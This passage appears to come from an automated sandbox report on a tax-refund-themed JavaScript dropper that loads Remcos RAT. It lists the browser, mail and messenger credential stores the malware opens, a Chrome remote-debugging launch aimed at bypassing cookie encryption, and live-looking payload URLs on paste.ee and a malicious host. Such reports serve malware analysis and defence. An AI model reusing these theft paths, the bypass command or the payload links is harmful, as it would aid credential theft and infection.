Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

12_2_0041881C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

13_2_004082CD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

27_2_00448067

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_0041739B GetVersionExW,

12_2_0041739B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

27_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		27_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: \key3.db		27_2_0040B335

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ESMTPPassword	13_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	13_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	13_2_00402DB3

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Remcos RAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: cmd.exe

27_2_00405042

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Native API	221 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	3 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	32 Command and Scripting Interpreter	1 Windows Service	1 Extra Window Memory Injection	1 DLL Side-Loading	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Bypass User Account Control	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	111 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	1 Windows Service	1 Extra Window Memory Injection	LSA Secrets	48 System Information Discovery	SSH	3 Clipboard Data	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	321 Process Injection	11 Masquerading	Cached Domain Credentials	41 Security Software Discovery	VNC	GUI Input Capture	3 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	14 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	321 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Tax_Refund_Claim_2024_Australian_Taxation_Office.js	5%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://102.175.153.160.host.secureserver.net	100%	Avira URL Cloud	phishing
https://102.175.153.160.host.secureserver.net/file.js	100%	Avira URL Cloud	phishing
https://tunnel-staging.googlezip.net/2	0%	Avira URL Cloud	safe
http://tls-tunnel-check.googlezip.net/connect2	0%	Avira URL Cloud	safe
https://googleusercontent.comb	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://analytics.paste.ee	0%	Avira URL Cloud	safe
https://102.175.153.160.host.sec	0%	Avira URL Cloud	safe
http://102.175.153.160.host.secureserver.net	100%	Avira URL Cloud	phishing
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://www.privacysandbox.comb	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
paste.ee	188.114.96.3	true	false	high
geoplugin.net	178.237.33.50	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
102.175.153.160.host.secureserver.net	160.153.175.102	true	true	unknown
googlehosted.l.googleusercontent.com	142.250.186.97	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
res.cloudinary.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/DDqbU	false		high
https://102.175.153.160.host.secureserver.net/file.js	true	Avira URL Cloud: phishing	unknown
http://geoplugin.net/json.gp	false		high
https://paste.ee/d/5VcuL/0	false		high
https://chrome.cloudflare-dns.com/dns-query	false		high
https://paste.ee/d/snSm4	false		high
https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://google-ohttp-relay-query.fastly-edge.com/andboxAdsAPIsM1Override)	chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1962977700.000029E001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/coacbE	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/.	chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Mf	chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/1	chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/5	chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee/d/snSm4o	wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-safebrowsing.fastly-edge.com/https://google-ohttp-relay-safebrowsing.fast	chrome.exe, 0000000B.00000003.1965014387.000029E00171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1965049460.000029E001720000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe	false		high
http://geoplugin.net/json.gp/C	MSBuild.exe, 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://102.175.153.160.host.secureserver.net	powershell.exe, 00000006.00000002.2125755339.000002E390EF6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://102.175.153.160.host.sec	powershell.exe, 00000006.00000002.2125755339.000002E390E99000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-safebrowsing.fastly-edge.com/b	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableEverythingProduction	chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/snSm4T	wscript.exe, 00000000.00000002.1659977048.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657005311.0000024B54891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655920499.0000024B5488D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/E	chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/vi	chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.yahoo.com/config/login	MSBuild.exe	false		high
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	MSBuild.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A4D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926	chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/	chrome.exe, 0000000B.00000003.1925510952.000029E0012F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://googleusercontent.comb	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1947143045.000029E000320000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tunnel-staging.googlezip.net/2	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/)	chrome.exe, 0000000B.00000003.1954717451.000029E00157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954640884.000029E00156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000006.00000002.2125755339.000002E390EF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestionsJK	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com;	wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	MSBuild.exe	false		high
http://dns-tunnel-check.googlezip.net/connect2	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/snSm43r.dll	wscript.exe, 00000000.00000002.1659348824.0000024B52A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656914447.0000024B52981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657030423.0000024B52A28000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_An	chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=blockedb	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tls-tunnel-check.googlezip.net/connect2	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/coac	chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/2	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://102.175.153.160.host.secureserver.net	powershell.exe, 00000006.00000002.2125755339.000002E39141D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/b	chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/	chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955212656.000029E0015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954717451.000029E00157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954640884.000029E00156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1962977700.000029E001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955249369.000029E0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951666580.000029E001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/snSm4#	wscript.exe, 00000000.00000002.1660109646.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657501584.0000024B549CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-safebrowsing.fastly-edge.com/	chrome.exe, 0000000B.00000003.1965049460.000029E001720000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgX	powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.privacysandbox.comb	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg	powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestionsJ	chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableFullscreenAppListEna	chrome.exe, 0000000B.00000002.1994179249.000029E001D4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/accounts/servicelogin	MSBuild.exe	false		high
